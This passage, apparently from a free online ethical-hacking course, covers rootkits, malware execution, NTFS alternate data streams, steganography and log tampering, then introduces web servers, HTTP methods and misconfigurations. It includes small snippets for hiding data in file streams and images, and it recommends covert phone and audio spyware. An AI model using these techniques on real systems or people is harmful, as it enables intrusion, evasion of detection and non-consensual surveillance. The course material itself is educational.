tools to retrieve the victim's original passwords. Some privilege escalation tools are listed
below:

 Windows Administrator Password Reset
 Trinity Rescue Kit
 Windows Password Recovery Bootdisk

Escalation of Privileges: Countermeasures


The best measure against privilege escalation is to ensure that users have the least privileges,
or just enough privileges, to use their systems effectively. Often, flaws in programming code
allow such privilege escalation: an attacker who gains access to the network using a
non-administrative account may then obtain the higher privileges of an administrator.

General counter-measures of privilege escalation include:

 Restrict interactive sign-in privileges
 Run users and applications with the least privileges
 Implement multi-factor authentication and authorization
 Run services as non-privileged accounts
 Use encryption to protect confidential data
 Implement a privilege separation methodology to limit the scope of programming errors
 Reduce the amount of code that runs with elevated privileges
 Perform debugging using bounds checkers and stress tests
 Thoroughly test the operating system and applications for errors and coding flaws
 Update systems regularly

Application Execution
Attackers execute malicious applications at this stage. This is called "owning" the system; the
execution of applications takes place after the attacker obtains administrative privileges. The
attacker may try to run some of his or her own malicious programs remotely on the victim's
machine to collect information that leads to exploitation or loss of privacy, gain unauthorized
access to system resources, crack passwords, capture screenshots, install a backdoor to maintain
covert access, etc.

The malicious programs that the attacker runs on the victim's machine can be:

 Backdoors: programs designed to deny or disrupt operation, collect information that leads
to exploitation or loss of privacy, or give an attacker remote access without raising
alerts on the victim's system.
 Crackers: pieces of software or programs designed to decipher codes or passwords.
 Keyloggers: these can be hardware or software. In either case, the goal is to record each
and every keystroke made on the computer keyboard.
 Spyware: spyware can capture screenshots and send them to a location defined by the
attacker. The attacker must maintain access to the victim's computer until his or her
purpose is fulfilled. After extracting all the required information from the victim's
computer, the attacker installs several backdoors to maintain easy access to it in the
future.

Recommended tools

 RemoteExec installs applications remotely, executes programs, scripts and updates files
and folders on Windows systems through the network. It allows the attacker to modify
the registry, change local administrator passwords, disable local accounts and copy,
update, delete files and folders.

 PDQ Deploy, is a software deployment tool with which you can easily install almost any
application or patch on your computer. MSI, MSP, MSU, EXE and batch installers can be
deployed remotely on numerous Windows computers at the same time with this tool.
Easy and fast, PDQ Deploy features include integration with Active Directory,
Spiceworks, PDQ Inventory and installations on multiple computers simultaneously, as
well as real-time status, etc.

 Spytech SpyAgent (keylogger) is a software keylogger that lets you monitor the keystrokes
made on the computer on which it is installed.

 Sound Snooper (audio spyware) is espionage software that lets you control the sound and
voice recorders in the system. It starts recording invisibly once it detects sound and
stops recording automatically when the voice disappears. It can be used for recording
conferences, monitoring telephone calls, recording radio broadcasts, espionage and employee
monitoring, etc. It has voice-activated recording, supports multiple sound cards, stores
recordings in any sound format, sends emails with recorded attachments, and is compatible
with Windows.

 Phone Spy is mobile spyware that helps you monitor and record the activities of a target
mobile phone. You need to install this software on the phone you want to monitor; with the
help of this software you can record the target's activities, logs and GPS locations. To
see the results, you only need to log in to your secure account using any computer or
mobile web browser. The records are displayed by categories and ordered for easy
navigation.

Countermeasures against the execution of Malware

 Install antivirus and antispyware software. Viruses, Trojans and other malware are the
means by which software keyloggers invade the computer, so antivirus and antispyware are
the first line of defense against keyloggers. With the keystroke-logger cleaning
applications available online, keyloggers detected by the antivirus can be removed from the
computer.
 Install a host-based IDS, which can monitor your system and block the installation of
keyloggers.
 Enable the firewall on the computer. Firewalls prevent external access to the computer and
can block the transmission of recorded information to the attacker.
 Keep track of the programs running on the computer. Use software that frequently scans and
monitors changes in the system or network; keyloggers typically run transparently in the
background.
 Keep your hardware secure in a locked environment and frequently check the keyboard cables
and USB ports for attached connectors (hardware keyloggers).

Rootkits

Rootkits are software programs designed to gain access to a computer without being detected.
They are malicious programs that can be used to gain unauthorized access to a remote system
and perform malicious activities. The goal of a rootkit is to obtain root privileges on a system.
By logging in as the root user of a system, an attacker can perform any task, such as installing
software or deleting files. Rootkits work by exploiting vulnerabilities in the operating system
and applications. A rootkit builds a backdoor login process into the operating system through
which the attacker can bypass the standard login process. Once root access is obtained, the
rootkit can try to hide the traces of unauthorized access by modifying drivers or kernel modules
and hiding active processes. Rootkits replace certain operating system calls and utilities with
their own modified versions of those routines which, in turn, undermine the security of the
target system and cause malicious functions to be executed. A typical rootkit consists of
backdoor programs, DDoS programs, packet sniffers, log-wiping utilities, IRC bots, etc.

All files contain a set of attributes with several different fields. The first field is used to
determine the format of the file, that is, whether it is a hidden, archive or read-only file. The
other fields describe the time at which the file was created, when it was last accessed, and its
original length. The functions GetFileAttributesEx() and GetFileInformationByHandle() expose this
information. ATTRIB.exe is used to display or change file attributes. An attacker can hide a
victim's files, or even change their attributes, in order to access them.

Why a Rootkit?

The main purpose of a rootkit is to allow an attacker repeated, unregulated and undetected access
to a compromised system. Installing a backdoor process, or replacing one or more of the files that
run the normal connection processes, can help meet this goal.

Attackers use rootkits to:

 Root the host system and gain remote backdoor access
 Hide the traces of an attack and the presence of malicious applications or processes on the
target system
 Collect confidential data, network traffic, etc. from parts of the system to which the
attackers would otherwise be restricted or have no access
 Store other malicious applications and act as a server resource for bot updates, etc.

Types of Rootkits

A rootkit is a type of malware that can be hidden from the operating system and
antivirus applications on the computer. This program provides attackers with root-level access to
the computer through the back doors. These rootkits employ a variety of techniques to gain
control of a system. The type of rootkit influences the choice of the attack vector. Basically,
there are 6 types of rootkits available.
1. Hypervisor level rootkits are generally created by exploiting hardware features such as
Intel VT and AMD-V. These rootkits host the target operating system as a virtual
machine and intercept all hardware calls made by the target operating system. This type
of rootkit works by modifying the startup sequence of the system and is loaded instead of
the monitor of the original virtual machine.
2. Kernel-level rootkits: the kernel is the core of the operating system. These rootkits add
backdoors to the computer and are created by writing additional code, or by replacing parts
of the kernel code with modified code, through device drivers in Windows or loadable kernel
modules in Linux. If the kit's code contains errors, kernel-level rootkits greatly affect
the stability of the system. Because they run with the same privileges as the operating
system, they are difficult to detect and can intercept or subvert operating system
operations.
3. The application level rootkit operates inside the victim's computer replacing the
standard application files with rootkits or modifying the current applications with
patches, injected code, etc.
4. Hardware/firmware rootkits use devices or platform firmware to create a persistent
malware image on hardware such as a hard drive, the system BIOS or a network card. The
rootkit hides in the firmware because firmware is usually not inspected for code
integrity. A firmware rootkit therefore amounts to creating a permanent malware image in
the device's firmware.
5. Boot-loader-level (bootkit) rootkits work either by replacing or modifying the legitimate
boot manager with another. The boot-loader-level (bootkit) can be activated even before
the operating system starts. Therefore, boot-loader-level rootkits (bootkit) are serious
threats to security, as they can be used to steal encryption keys and passwords.
6. Library-level rootkits work higher up in the operating system; they generally patch, hook
or replace system calls with backdoor versions in order to keep the attacker unknown. They
replace the original system calls with fake ones to hide information about the attacker.

How to detect a Rootkit?

Rootkit detection techniques are classified as signature, heuristics, integrity, cross-view based,
and execution path profiles at runtime.

1. Signature-based detection methods work like rootkit fingerprints: the byte sequence of a
file is compared against byte sequences known to belong to malicious programs. This
technique is mainly used on system files. Rootkits that hide themselves can often still be
detected by scanning kernel memory. The success rate of signature-based detection is
reduced by the tendency of rootkits to hide files and to interrupt the execution path of
the detection software.
2. Heuristic detection works by identifying deviations from the normal patterns or behaviors
of the operating system. This type of detection is also known as behavioral detection.
Heuristic detection is able to identify new, previously unidentified rootkits, because it
recognizes deviations from the system's "normal" patterns or behavior. Execution-path
hooking is one of the deviations that causes heuristic-based detectors to identify
rootkits.
3. Integrity-based detection works by comparing the current file system, boot records or
memory snapshots with a known, reliable baseline. Evidence of malicious activity can be
noted from the differences between the current snapshot and the baseline.
4. Cross-view-based detection techniques work by assuming that the operating system has
been subverted in some way. They enumerate the system files, processes and registry keys
by calling the common APIs and then compare this information with a data set obtained
through an algorithm that traverses the same data at a low level. This detection technique
relies on the fact that API hooking or manipulation of kernel data structures contaminates
the data returned by the operating system APIs, while the low-level mechanisms used to
generate the same information remain free of DKOM or hook manipulation.
5. Run-time execution-path profiling compares the execution-path profile of all system
processes and executable files. A rootkit adds new code near the execution path of a
routine in order to hook it, so the number of instructions executed before and after a
given routine is hooked can differ significantly.

Countermeasures against Rootkits

A common feature of these rootkits is that the attacker requires administrator access to the
target system. The initial attack that leads to this access is usually noisy, so the excess
network traffic that arises when a new exploit is used should be monitored. It goes without
saying that log analysis is part of risk management. The attacker may have shell scripts or tools
to help cover his or her tracks, but there will usually be other telltale signs that can lead to
proactive countermeasures, not just reactive ones.

A reactive countermeasure is to back up all critical data, excluding binaries, and perform a
clean, fresh installation from a reliable source. Code verification is a good defense against
tools like rootkits. MD5sum.exe can fingerprint files and reveal integrity violations when
changes occur. To defend against rootkits, integrity checking programs can be used for critical
system files. Numerous tools, programs and techniques are available for finding rootkits.
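The following is a minimal sketch of the integrity-checking idea just described: fingerprint
critical files while the system is known to be clean, then compare later hashes against that
baseline. The file paths are illustrative assumptions; SHA-256 is used instead of MD5 simply
because it is stronger and equally available in the standard library.

import hashlib

def fingerprint(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(8192), b""):
            h.update(chunk)
    return h.hexdigest()

# Record the baseline while the system is known to be clean
baseline = {p: fingerprint(p) for p in ["/bin/ls", "/bin/ps"]}

# ...later, compare the current state against the baseline
for path, known in baseline.items():
    if fingerprint(path) != known:
        print("Integrity violation:", path)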

Some techniques that are adopted to defend against rootkits are listed as follows:

 Reinstall the OS and applications from a trusted source after backing up critical data
 Maintain well-documented automated installation procedures
 Install host-based and network-based firewalls
 Use strong authentication
 Keep trusted restoration media available
 Harden the workstation or server against attack
 Keep operating system and application patches up to date
Countermeasures against Rootkits: recommended programs

McAfee Stinger helps you detect and remove common malware, viruses and FakeAlert threats on your
system. Stinger scans rootkits, running processes, loaded modules, the registry and the directory
locations used by malware on the machine in order to minimize scanning times. It can also repair
infected files found on your system, and it detects and deactivates viruses on your system.

UnHackMe is basically anti-rootkit software that helps you identify and eliminate all types of
malicious software such as rootkits, trojans, worms, viruses, etc. The main purpose of UnHackMe
is to prevent rootkits from damaging your computer, helping users protect themselves against
masked intrusion and data theft. UnHackMe also includes the Reanimator feature, which you can use
to perform a complete spyware check.

Handling NTFS stream

In addition to the file attributes, each file stored on an NTFS volume generally contains two
data streams. The first data stream stores the security descriptor and the second stores the data
within the file. Alternate data streams are additional named data streams that can be present
within each file.

An Alternate Data Stream (ADS) is any kind of data that can be attached to a file on an NTFS
system without being part of the file's main contents. The master file table of the partition
contains a list of all the data streams that a file contains and their physical location on the
disk. Alternate data streams are therefore not present in the file itself, but are associated
with it through the file table. NTFS Alternate Data Streams are hidden Windows streams that can
contain metadata for the file such as attributes, word count, author name and access and
modification times.

ADS makes it possible to attach data to existing files without changing or altering their
functionality, size or appearance in file browsing utilities. ADSs give attackers a method for
hiding rootkits or hacker tools on a compromised system and allow them to be executed without
being detected by the system administrator. Files with an ADS are impossible to detect using
native file browsing techniques such as the command line or Windows Explorer. After attaching an
ADS to the original file, the file size shown is still the original size, regardless of the size
of the attached stream. The only indication that the file was changed is the modification time
stamp, which can be relatively innocuous.
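As a hedged illustration, the sketch below creates and reads back an alternate data stream from
Python. This only works on an NTFS volume under Windows; the file and stream names are
illustrative assumptions.

# The visible cover file
with open("report.txt", "w") as f:
    f.write("ordinary contents")

# Data attached to the same file as an alternate data stream
with open("report.txt:hidden.txt", "w") as f:
    f.write("secret data stored in the stream")

# A normal directory listing still shows only report.txt with its original size,
# but anyone who knows the stream name can read it back:
with open("report.txt:hidden.txt") as f:
    print(f.read())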

How to defend against NTFS streams


You can use the LADS.exe tool as a countermeasure for NTFS streams. The latest version of
LADS.exe reports on the presence of ADSs, and it is useful for administrators because it shows
its results on screen. The tool searches for single or multiple streams and reports the presence
of ADSs, along with the complete path and length of each ADS that it locates.

Other means include copying the cover file to a FAT partition and then moving it back to NTFS.
Because FAT does not support alternate streams, this destroys them.

Recommended tools

1. lns.exe is a tool used to detect NTFS streams. It is useful in forensic investigations.
2. Stream Armor helps you detect hidden alternate data streams (ADS) and remove them
completely from your system. Its multithreaded ADS scanner can recursively scan the entire
system and discover all hidden streams. It can easily distinguish a suspicious data stream
from a normal one, since it shows each discovered stream with a specific color pattern. It
is also capable of detecting the file type using an advanced file-type detection mechanism.

Steganography
It has been argued that one of the shortcomings of several detection programs is their primary
focus on the transmission of text data. What happens if an attacker bypasses normal surveillance
techniques and still steals or transmits confidential data? A typical situation would be an
attacker who manages to enter a company as a temporary or contract employee and surreptitiously
searches for confidential information. While the organization may have a policy that no
electronic equipment may be removed from the facility, a determined attacker can still find ways
to use techniques such as steganography.

Steganography is defined as the art of hiding data behind other data without the knowledge of the
enemy. It replaces unused data bits in ordinary files (graphics, sound, text, audio, video) with
the bits of the data to be concealed. The hidden data can be plain text, encrypted text or even
an image.

The appeal of steganography is that, unlike encryption, it is not easily detected. When an
encrypted message is transmitted, it is obvious that a communication has occurred, even if the
message cannot be read. Steganography hides the very existence of the message. An attacker can
use it to hide information even when encryption is not a feasible option. From a security point
of view, steganography can also be used to hide a file in encrypted form, so that even if the
file is decrypted, the message remains hidden.
Attackers can insert information such as:

 Source code for the hacking tool


 List of compromised servers
 Plans for future attacks
 Communication and coordination channel

We will see more about steganography in the practical part of this computer security course module.
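In the meantime, here is a minimal sketch of the idea behind LSB (least significant bit)
steganography: each bit of the secret message replaces the least significant bit of one byte of
the cover data. A real tool would operate on the pixel or sample data of an image or audio file;
here a plain bytearray stands in for that cover data, so the example stays dependency-free.

def hide(cover: bytearray, secret: bytes) -> bytearray:
    # Flatten the secret into bits, most significant bit first
    bits = [(byte >> i) & 1 for byte in secret for i in range(7, -1, -1)]
    out = bytearray(cover)
    for i, bit in enumerate(bits):
        out[i] = (out[i] & 0xFE) | bit        # overwrite only the LSB
    return out

def reveal(stego: bytearray, length: int) -> bytes:
    bits = [b & 1 for b in stego[:length * 8]]
    return bytes(
        sum(bit << (7 - i) for i, bit in enumerate(bits[n:n + 8]))
        for n in range(0, len(bits), 8)
    )

cover = bytearray(range(256)) * 4             # stand-in for image data
stego = hide(cover, b"attack at dawn")
print(reveal(stego, len(b"attack at dawn")))  # b'attack at dawn'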

Cover tracks
The complete work of an attacker involves not only compromising the system successfully but also
disabling logging, deleting log files, eliminating evidence, planting additional tools and
covering their tracks. The attacker must erase the evidence of "having been there and having done
the damage". Deleting intrusion logs, trace files and attack processes is very important for an
attacker, since log messages can alert the real owner of the system to change security settings
and thus prevent future attacks. If this happens, the attacker will have no further chance to
re-enter the system and launch the attack. Therefore, an attacker needs to destroy the evidence
of intrusion in order to maintain access and evade detection. If the attackers cover or remove
their traces, they can log back into the system, install backdoors, and thereby obtain sensitive
information from users, such as usernames, bank account passwords, email IDs, etc.

The attacker may not want to delete an entire log to cover his or her tracks, as doing so may
require administrator privileges. If the attacker can delete only the event logs related to the
attack, he or she can still avoid detection.

The elimination of evidence or traces is a requirement for any attacker who wishes to remain
hidden. It is a method of evading detection. It starts with deleting the contaminated logins and
any error messages that may have been generated by the attack process. Next, attention turns to
making changes so that future logins are not logged. By manipulating and modifying the event
logs, the system administrator can be convinced that the output of the system is correct and that
no intrusion or compromise has occurred.

Since the first thing a system administrator does when investigating unusual activity is to check
the system's log files, it is common for intruders to use a utility to modify the system logs. In
some cases, rootkits can disable and discard all existing logs; intruders do this if they intend
to use the system for a longer period as a launching base for future intrusions. Otherwise, they
remove only those parts of the logs that could reveal their presence and the attack.

It is imperative for attackers to make the system look as it did before they gained access and
set up backdoors for their use. All files that have been modified must be restored to their
original attributes. Tools exist to cover tracks on the NT family of operating systems. The
information listed, such as file size and date, is just attribute information contained in the
file. Protecting yourself against an attacker who is trying to cover his or her tracks by
changing file information can be difficult. However, it is possible to detect whether an attacker
has changed a file by calculating a cryptographic hash of it. This type of hash is a calculation
made over the entire file, which is then stored in protected (encrypted) form.

Tools: Auditpol

One of the first steps for an attacker with command-line access is to determine the auditing
status of the target system, locate confidential files (such as password files), and deploy
automatic information-gathering tools (such as a keystroke logger or a network sniffer).

Windows auditing records certain events in the Event Log (or an associated syslog). The logging
can be configured to send alerts (email, pager, etc.) to the system administrator. Therefore, the
attacker will want to know the audit status of the system he or she is trying to compromise
before continuing. The Auditpol.exe tool is part of the NT resource kit and can be used as a
simple command-line tool to find out the auditing status of the target system and also to make
changes to it.

System attacks in Pentesting


In an attempt to hack a system, the attacker initially tries to crack the system password, if
applicable. Therefore, as a pentester, you should also try to crack the system password.

1. Identify password protected systems: identify the target system whose security needs to
be evaluated. Once you identify the system, check if you have access to the password,
that is, a stored password. If the password is not stored, try several password cracking
attacks one after the other on the target system.
2. Once the attacker obtains the system password, he or she tries to escalate their privileges
at the administrator level so that they can install malicious programs or malware on the
target system and thus retrieve confidential information from the system. As a pentester,
you must hack the system as a normal user and then try to escalate your privileges.
3. Pentesters should verify the target systems by running some applications to discover the
gaps in the target system.
4. An attacker installs the rootkits to keep the access hidden from the system. You must
follow the steps of the pentesting to detect hidden files in the target system
5. The pentester must check whether he or she can cover the traces generated during the
simulated attack, as an attacker would.

This module ends here; I hope you have been able to learn the objectives of this module. This
course takes a lot of effort and is free, so I would like you to share it on your social networks
or in hacking forums so that more people can see it. The course will continue to advance through
several modules; you can subscribe if you want to follow the progress of the course.

9 April 2018

Free Ethical Hacking Course - Module 6 - Hacking Webservers
Ethical Hacking Course, Computer Security

Full course: en.gburu.net/hack, here you will find all the topics of this free ethical hacking
course, in one place.

Responsibility:
This ethical hacking course is aimed at educational purposes, to improve your computer security
skills so you can plan and design safer networks. It does not encourage illegal activities in
third-party systems or networks; if you carry out an illicit activity in a system or network, you
do so at your own risk. If you want to practice and improve your ethical hacking skills, do it on
systems for which you have legal permission or that belong to you; I recommend using operating
system images installed in virtual machines in a controlled environment.

Agenda: Module 6 - Hacking Webservers

 Objectives of module 6
 What is a Server?
o How does a Web Server work?
o Client-server model
o Roles: in the client-server model
o Protocol: HTTP
 HTTP: methods
o Most popular web servers
 Why is a web server at risk?
o Perspectives of the developer, network administrator and end user
o Common causes that facilitate attacks on Servers
 What impact does the server receive after an attack?
 Website defacement
 Default configuration, in web servers
 Cross directory attacks (directory traversal)
 HTTP response split attack
 Web cache poisoning attack
 HTTP response hijacking
 Brute force against SSH
 Attack: Man in the middle
 Deciphering passwords
o Web server password decryption techniques
 Attacks against web applications
 Methodology of attack against a Server
o Gather information
o Get information about services
o Vulnerability scan
o Session hijacking
 Countermeasures to protect a Web Server
o Countermeasures: Update and security patches
o Countermeasures: Protocols and services
o Countermeasures: Files and server directories
o How to defend against web server attacks
o Good practices recommended
 Patch Management
o What is Patch Management?
o Patch management: recommended tools
 Pentesting: server hacking

Objectives of Module 6
Often, a security breach causes more harm in terms of goodwill (you lose your customers' loyalty
once they know you cannot protect the information they host on your server) than in actual
quantifiable loss. This makes web server security critical to the normal functioning of a
company; or at least we all want to believe that the companies behind the applications we use
every day care about our information and invest in security...

Most companies consider their web presence an extension of themselves. This module tries to
highlight the various security concerns in the context of web servers; in it you will learn what
a web server is and its architecture, the types of attacks that are often used by computer
criminals, the most commonly used tools, etc. It is worth mentioning that web server hacking is a
very broad topic and this module only gives a general introduction; I recommend that you continue
investigating on your own after finishing this module to increase your knowledge of server
hacking.

Overview of what we will see in this sixth module of the free computer security course:

 What is a Web Server, and how does it work?
 Why do attackers target Servers?
 Impact of attacks against Servers
 Attacks against Web Servers
 Methodology of attacks against Servers
 Tools that are usually used
 Countermeasures, and how to defend ourselves
 Patch management and tools to automate system updates
 Server hacking in Pentesting

What is a Server?
A server is like the computers we use on a daily basis, in other words it is still a commonly used
computer. It has some differences that I will try to explain in a simple way since this course does
not deal with server hardware. Well, let's see the differences that a server of our computer has.

A server is always in a rack, located inside a data center, the rack is like a cabinet or closet but
very high in it you can host several servers, let's see how it is:

We usually have the computer in a cabinet, but the server looks different, for example, this Dell
brand server:

As we can see, it does not look like the cabinet we usually see, but inside it still has the same
components as a computer, although of course they are high performance.

In addition to the above, servers are managed remotely, that is, they are designed to be
controlled from anywhere in the world through a terminal or command console. On our own computer
we generally have a graphical interface; this is not the case on a server, since in most cases we
connect via SSH and execute commands so that the server does what we ask, from running a simple
task to deploying a web application.

As we can see in the image, a data center is a building where all the racks that contain servers
are located; data centers are also known as "server farms".

What is a Web Server, and how does it work?

Now that we understand what a server is, understanding what a web server is will be easier.

Let's take the example of the Dell server that we saw in the image above. We install an operating
system (Linux or Windows), then we install software (Nginx, Apache, IIS, etc.) that is
responsible for receiving requests (GET, POST, etc.), processing them and returning responses:
information from a database, an HTTP error code (404, 500, etc.) or files such as HTML, CSS, JS,
PHP, .NET, JSP, ASP, MP3, JPG, PNG, MP4, PDF, etc. With that we have a web server; now let's dig
a little deeper.

Therefore, a web server is a program that can be installed on an operating system and run on any
port you want (by default they usually run on port 80 or 8080). It can make bidirectional
connections, that is, send and receive information at the same time, as well as unidirectional
connections that send a response to a single point. All the information sent by the server is
rendered by a web browser (software) and then presented visually to the client, either over HTTP
or HTTPS.
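To make this concrete, here is a minimal sketch of a web server using only the Python standard
library: it listens on a port, receives HTTP requests and returns responses, which is exactly the
role described above. Port 8080 is an arbitrary choice; this is a learning sketch, not a
production server like Nginx or Apache.

from http.server import HTTPServer, SimpleHTTPRequestHandler

# SimpleHTTPRequestHandler answers GET requests with files from the current
# directory (HTML, CSS, JS, images...), returning 200 or 404 as appropriate.
server = HTTPServer(("0.0.0.0", 8080), SimpleHTTPRequestHandler)
print("Serving on http://localhost:8080 ...")
server.serve_forever()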

Client-server model

The web server is the intermediate layer between the client-side and the server-side languages.
A web application is composed of a back-end, where we find a programming language that can be
PHP, NodeJS (JavaScript), .NET, JSP (Java), Ruby, etc. The back-end language is responsible for
receiving the requests processed by the server and taking actions depending on the business
logic; it can query a database (MySQL, PostgreSQL, Redis, etc.) and return an answer that the
server processes and sends to the client. The client lives in the front-end, a layer usually
composed of HTML, JS, CSS and multimedia files.

Roles in the client-server model

 The client: is the sender of a request, so its role in the communication is active. It can send requests to several servers at the same time and wait for their responses; this is normally done through a graphical interface (the web browser). For example, we open our browser and enter gburu.net and facebook.com: we make two requests simultaneously and wait for the responses of two different servers.
 The server: is the receiver of the requests made by a client, so its role is passive: it starts out waiting for requests on the configured port. It processes every request, can hand them off to the back-end programming language, and then returns a response to the client. It can receive and process many requests at the same time, depending on the hardware it was given; a web server can be used both locally for testing and in production, since it scales with the resources available.

Protocol: HTTP

A server can be used in many ways: for email, for file storage, dedicated to databases, etc. In this module of the computer security course we will focus on web-oriented servers, so let's talk a little about HTTP.

HTTP is a transaction-oriented protocol that follows a request-response scheme between a client and a server. The client (usually called the "user agent") makes a request by sending a message in a defined format to the server. The server (usually called a web server) sends back a response message. Examples of clients are web browsers and web spiders (also known as web crawlers).

HTTP is involved in every website we visit from a browser. For example, let's look at the client-server pattern from the HTTP perspective when we visit https://gburu.net:

 General:

A request is made to https://gburu.net using the GET method, and we receive a 200 status code telling us that the requested resource is available.

In the response, the "content-type" header shows that the server returned an HTML file encoded in UTF-8; in our request we can see the 'user-agent' header, the content types we accept to receive, the method used and the requested path.
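A quick way to reproduce this exchange yourself is with a small Python script. This is only a sketch, assuming the third-party 'requests' library is installed (pip install requests); the User-Agent string is just an example value.

import requests

# Send a GET request, the same one a browser would make when visiting the site
response = requests.get("https://gburu.net", headers={"User-Agent": "demo-client/1.0"})

print(response.status_code)                  # e.g. 200 when the resource is available
print(response.headers.get("Content-Type"))  # e.g. text/html; charset=UTF-8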

HTTP: methods

HTTP defines several verbs (methods) that can be used in requests:

 GET: the most common method, used by default whenever we enter a URL. The method accepts "parameters", and everything passed via GET is visible to anyone who looks at the URL. For example, when we are on page 2 of a website we usually see "/index.php?page=2": the parameter is "page", its value is "2", and its purpose is to return page number 2. Since the parameters travel in the URL, this method is recommended for searches, filters, content ordering and pagination.
 POST: the second most common HTTP method. It carries sensitive information to the server so that it can be processed by the back-end language; typical uses are login, registration and contact forms, since the data is encoded in the request body and not shown in the URL as with GET. POST also works well with cookies, which is useful for remembering logged-in users and storing information in the browser for later use. POST is the recommended method for operations that modify resources (add, edit, delete), and for extra security it is advisable to use POST over HTTPS.
 PUT: usually the most efficient way to handle file uploads to a web server. POST, by contrast, has to encode the resource (the file) in a multipart message, which the server side must then decode. Example of an HTML form that uploads a file with POST:

<form action="/upload.php" method="POST" enctype="multipart/form-


data"></form>

PUT, on the other hand, sends the file over a direct socket connection to the server, which makes it more efficient, but you need full control of the server (for example a VPS), since some shared hosting providers do not allow the PUT method.

Keep in mind: modern browsers and current HTML standards only officially support the GET and POST methods in forms. To use PUT, it is enough to create a POST form and add a hidden field with the name "_METHOD" and the value "PUT", which looks like this:

<form action="/upload.php" method="POST" enctype="multipart/form-data">


<input type="hidden" name="_METHOD" value="PUT"/>
</form>

 PATCH: similar to PUT, but used to apply partial updates to an existing resource.
 DELETE: deletes or destroys resources of a web application.
 TRACE: intended for debugging; when enabled it lets a client see what the server (and any intermediate servers) received. It is usually disabled so as not to provide information that could help an attacker.
 OPTIONS: returns the HTTP methods that the server supports for a specific URL. It can also be used to check the capabilities of the web server itself rather than of a specific resource.
 CONNECT: used to check whether a host can be reached; the request does not necessarily arrive at the destination server. This method is mainly used to ask a proxy for access to a host under special conditions, such as streams of encrypted bidirectional data (as required by SSL/TLS).
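As a quick check of which methods a given server accepts, you can send an OPTIONS request and read the Allow header. A minimal sketch with the 'requests' library (the URL is only a placeholder, and not every server answers OPTIONS):

import requests

# Ask the server which methods it supports for this URL
response = requests.options("https://gburu.net")
print(response.status_code)
print(response.headers.get("Allow"))  # e.g. "GET, HEAD, POST, OPTIONS" when the header is sent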

Most popular Web Servers

There are many software packages that can perform the routine tasks of a web server, but there is a market behind them and most deployments end up using one of three:

In the latest report (April 2018) from w3techs, the web server with the largest market share is Apache, followed by Nginx, with Microsoft IIS in third place and LiteSpeed Web Server after that.

Why is a web server at risk?

There are different types of security risks associated with web servers, with the local area networks that host websites, and with the users who access those websites through browsers; threats can come from employees, the application market, competitors, organized cybercrime, and so on.

 Developer perspective: from the perspective of a web developer, the greatest security concern is that the web server can expose the local area network (LAN) or corporate intranet to the threats posed by the Internet. These can take the form of viruses, Trojans, attackers or the compromise of the information itself. Bugs in large, complex programs are often considered the source of impending security lapses, and web servers, being large and complex pieces of software, carry those inherent risks. In addition, the open architecture of web servers allows arbitrary scripts to be executed on the server while remote requests are being answered; any CGI script installed on the site may contain bugs that turn into security holes.
 Network administrator's perspective: from a network administrator's point of view, a poorly configured web server is another potential hole in the security of the local network. While the goal of a website is to provide controlled access to the network, too much control can make a website almost impossible to use. In an intranet environment, the network administrator must configure the web server carefully, so that legitimate users are recognized and authenticated and different user groups are assigned different access privileges.
 End user (client) perspective: the end user generally does not perceive any immediate threat, since surfing the web feels safe and anonymous. Most users lack technical or programming knowledge, so it is very unlikely that they will notice a computer attack, and even with that knowledge it is hard to tell that an external server is being attacked. Active content, such as malicious JavaScript planted after an attack on a website the user visits, can allow harmful applications such as viruses to invade the user's system. Active content running in the browser can also be a conduit for malicious software to bypass the firewall and spread into the user's local area network. Beyond that, an attack on a web server can give the attacker direct access to the database that stores sensitive information about the application's clients, without the user ever being aware of it.

Common causes that facilitate attacks on Servers

Most attacks against servers are made possible by the causes listed below:

 Server installed with the default configuration: unnecessary files that come by default with an installation, test files, and default configurations for users and their respective passwords.
 Incorrect file and directory permissions: a weak access control policy for internal employees; rigorous controls are avoided for convenience, so there are no clear limits on permissions or on access to sensitive information.
 Software patches are not applied: a lack of adequate security policies, procedures and maintenance across the infrastructure, so exposed software with a known vulnerability never receives the patch that fixes it.
 Untrusted certificates: self-signed certificates are used instead of certificates issued by a trusted authority, along with incorrect authentication against external systems.
 Lack of hardening in the infrastructure: no internal audit is applied to the system, and services that are not used are left running, giving the attacker more opportunities to find entry points. For example, SSH is used for remote administration and yet the Telnet service is also left open; an audit would show that Telnet is unnecessary when SSH is in use (this may vary case by case).
What impact does the server receive after an attack?

The impact a server suffers after being attacked can vary depending on the intentions of the criminal, but studies of past attacks and of what was done on compromised servers allow us to "predict" what an attacker is likely to go after; we will look at the details below:

 Compromised user accounts: many attacks on web servers focus on compromising user accounts. If the attacker can compromise an account, they can obtain a lot of useful information, from credit card data to personal details that can be used to extort the user or prepare further attacks.
 Alteration of information: the attacker can alter or delete data on the server or in the database. He or she can even install malicious software to attack internal employees of the organization.
 Website defacement: the computer criminal can change the design of the website at will, replacing the original design with their own to show an intimidating message to visitors.
 Secondary attacks: once the attacker has control of the web server (the primary attack), they can plant malicious JavaScript on the website and attack its users or visitors; this is known as a secondary attack.
 Data theft: data is one of a company's main assets. Attackers can gain access to confidential company data, such as the source code of a particular program, and steal it; this is known as intellectual property theft.
 Root access: when an attacker manages to escalate privileges and obtain the root user, they gain administrator access to the system and can then try to reach the rest of the network.

Website defacement

This is one of the most visible and popular types of attack. A "website defacement" consists of changing the main page of a website to show a message to visitors; it is usually a threat or simply the name of a group or individual criminal acting for different reasons, and in this way the attacker publicizes whatever "cause" they have.

Defacements often carry political propaganda or content offensive to users. In 2007 there was a series of computer attacks during a conflict between two nations, Estonia and Russia, triggered by a disagreement over the Bronze Soldier statue in Tallinn; among the attacks were defacements of websites in favor of Russia and of keeping the statue in its original place. In that example, the attacks were politically motivated.
Default configuration in web servers
Web servers have several vulnerabilities related to configuration, applications, files, scripts or web pages. Once the attacker finds such a vulnerability, for example remote access to the application, it becomes the door through which the attacker enters a company's network illegally.

These holes in the server can help attackers circumvent user authentication. Server misconfiguration refers to configuration flaws in the web infrastructure that can be exploited to launch several attacks against web servers, such as directory traversal, server intrusion and data theft. Once detected, these problems can be exploited easily and result in the compromise of the website.

 Remote access to the server (SSH) is usually the most common entry point: in many cases weak passwords are chosen and no limit on failed attempts is configured, so brute force attacks can be carried out.
 Unnecessary services left running and open to the public, which can give the computer criminal an advantage.
 Debug messages or information valuable to programmers left available to the general public.
 Anonymous and default users and passwords.
 A common example: the banner that reveals the web server version (the Server header) and often the back-end language as well (the X-Powered-By header):
